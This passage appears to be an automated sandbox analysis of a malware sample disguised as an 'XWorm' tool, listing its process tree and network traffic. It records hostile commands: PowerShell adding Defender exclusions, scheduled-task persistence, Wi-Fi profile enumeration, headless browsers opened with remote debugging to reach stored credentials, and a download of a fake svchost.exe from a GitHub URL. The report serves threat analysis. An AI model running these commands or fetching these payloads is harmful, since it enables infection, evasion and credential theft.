    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2464
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2832
- C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
  "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
  2⤵
  - Executes dropped EXE
  PID:4328
- C:\Users\Admin\AppData\Local\Temp\update.dotnet.exe
  "C:\Users\Admin\AppData\Local\Temp\update.dotnet.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:1760
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:1408
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:2824
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4248
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2796
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4392
  - - C:\Windows\system32\findstr.exe
      findstr All
      4⤵
      PID:1200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff96544cc40,0x7ff96544cc4c,0x7ff96544cc58
      4⤵
      PID:4940
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-logging --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --disable-logging --field-trial-handle=2384,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2380 /prefetch:2
      4⤵
      PID:4512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=1840,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2544 /prefetch:3
      4⤵
      PID:1408
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=2016,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2552 /prefetch:8
      4⤵
      PID:3624
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1660
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3220 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:380
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4100 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5320
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4692,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4704 /prefetch:8
      4⤵
      PID:5760
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4868,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4880 /prefetch:8
      4⤵
      PID:5796
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4924,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4920 /prefetch:8
      4⤵
      PID:5964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4764,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4804 /prefetch:8
      4⤵
      PID:6024
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=5020,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4916 /prefetch:8
      4⤵
      PID:6072
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=5076,i,6632727251768185405,9468500423912352673,262144 --disable-features=PaintHolding --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4904 /prefetch:8
      4⤵
      PID:5656
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    PID:556
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4112
  - - C:\Windows\system32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2584
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:5728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging
    3⤵
    - Uses browser remote debugging
    PID:5936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff9687346f8,0x7ff968734708,0x7ff968734718
      4⤵
      PID:5952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1524,6652069861532434488,12722140039540396955,131072 --disable-features=PaintHolding --disable-logging --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --disable-logging --mojo-platform-channel-handle=1556 /prefetch:2
      4⤵
      PID:6036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,6652069861532434488,12722140039540396955,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --disable-logging --mojo-platform-channel-handle=1848 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-logging --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1524,6652069861532434488,12722140039540396955,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5556
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:5372
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:5200
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf7b6a0c-4926-4810-b824-4a09faea4004.bat"
    3⤵
    PID:1200
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:5512
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1760
      4⤵
      Kills process with taskkill
      PID:5968
  - - C:\Windows\system32\timeout.exe
      timeout /T 2 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:1588

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5252

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5544

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6028

C:\Users\Admin\AppData\Local\msedge.exe
"C:\Users\Admin\AppData\Local\msedge.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:436
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5872

C:\ProgramData\OneDrive.exe
"C:\ProgramData\OneDrive.exe"
1⤵
- Executes dropped EXE
PID:4564

C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:5880
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6096

C:\ProgramData\OneDrive.exe
"C:\ProgramData\OneDrive.exe"
1⤵
- Executes dropped EXE
PID:5716

Network

DNS

github.com

chrome.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

https://github.com/HexShifter0/Xworm-V6.0/releases/download/BugFix%2BNewFeature/XWorm.V6.0.zip

chrome.exe

Remote address:

20.26.156.215:443

Request

GET /HexShifter0/Xworm-V6.0/releases/download/BugFix%2BNewFeature/XWorm.V6.0.zip HTTP/2.0
host: github.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 302

server: GitHub.com
date: Sat, 11 Jan 2025 10:46:00 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/857060987/e3b2468c-7571-438f-ac89-c9f7e6286baa?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250111T104600Z&X-Amz-Expires=300&X-Amz-Signature=68543124f6b79a0f5b3655b010710b45fad8ff4d6fedb6ed7301f95b8915a258&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DXWorm.V6.0.zip&response-content-type=application%2Foctet-stream
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C27B:C55FF:1172DD5:14FA792:67824BE8
DNS

objects.githubusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.108.133
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/857060987/e3b2468c-7571-438f-ac89-c9f7e6286baa?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250111T104600Z&X-Amz-Expires=300&X-Amz-Signature=68543124f6b79a0f5b3655b010710b45fad8ff4d6fedb6ed7301f95b8915a258&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DXWorm.V6.0.zip&response-content-type=application%2Foctet-stream

chrome.exe

Remote address:

185.199.111.133:443

Request

GET /github-production-release-asset-2e65be/857060987/e3b2468c-7571-438f-ac89-c9f7e6286baa?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250111T104600Z&X-Amz-Expires=300&X-Amz-Signature=68543124f6b79a0f5b3655b010710b45fad8ff4d6fedb6ed7301f95b8915a258&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DXWorm.V6.0.zip&response-content-type=application%2Foctet-stream HTTP/2.0
host: objects.githubusercontent.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/octet-stream
last-modified: Sun, 05 Jan 2025 15:24:16 GMT
etag: "0x8DD2D9D0486C939"
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1d606658-e01e-000d-70f7-602981000000
x-ms-version: 2024-11-04
x-ms-creation-time: Sun, 05 Jan 2025 15:24:16 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
content-disposition: attachment; filename=XWorm.V6.0.zip
x-ms-server-encrypted: true
via: 1.1 varnish, 1.1 varnish
fastly-restarts: 1
accept-ranges: bytes
age: 0
date: Sat, 11 Jan 2025 10:46:00 GMT
x-served-by: cache-iad-kjyo7100079-IAD, cache-lcy-eglc8600036-LCY
x-cache: HIT, MISS
x-cache-hits: 13, 0
x-timer: S1736592360.495356,VS0,VE76
content-length: 36196272
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

234.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.187.250.142.in-addr.arpa

IN PTR

Response

234.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f101e100net
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

134.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

95.146.21.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.146.21.2.in-addr.arpa

IN PTR

Response

95.146.21.2.in-addr.arpa

IN PTR

a2-21-146-95deploystaticakamaitechnologiescom
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

checkappexec.microsoft.com

Remote address:

8.8.8.8:53

Request

checkappexec.microsoft.com

IN A

Response

checkappexec.microsoft.com

IN CNAME

prod-atm-wds-apprep.trafficmanager.net

prod-atm-wds-apprep.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
POST

https://checkappexec.microsoft.com/windows/shell/actions

Remote address:

51.140.244.186:443

Request

POST /windows/shell/actions HTTP/2.0
host: checkappexec.microsoft.com
accept-encoding: gzip, deflate
user-agent: SmartScreen/2814751014982010
authorization: SmartScreenHash eyJhdXRoSWQiOiJhZGZmZjVhZC1lZjllLTQzYTYtYjFhMy0yYWQ0MjY3YWVlZDUiLCJoYXNoIjoiMDFJL1lBL1Vsb009Iiwia2V5IjoiVnE2N0liRmQrdEhrTUJHMkt2M3NiQT09In0=
content-length: 1182
content-type: application/json; charset=utf-8
cache-control: no-cache

Response

HTTP/2.0 200

date: Sat, 11 Jan 2025 10:46:29 GMT
content-type: application/json; charset=utf-8
content-length: 183
server: Kestrel
cache-control: max-age=0, private
request-context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
DNS

186.244.140.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

186.244.140.51.in-addr.arpa

IN PTR

Response
DNS

203.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.197.79.204.in-addr.arpa

IN PTR

Response

203.197.79.204.in-addr.arpa

IN PTR

a-0003a-msedgenet
DNS

fd.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

fd.api.iris.microsoft.com

IN A

Response

fd.api.iris.microsoft.com

IN CNAME

fd-api-iris.trafficmanager.net

fd-api-iris.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com

iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com

IN A

20.31.169.57
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
DNS

212.20.149.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

update.dotnet.exe

Remote address:

185.199.109.133:443

Request

GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

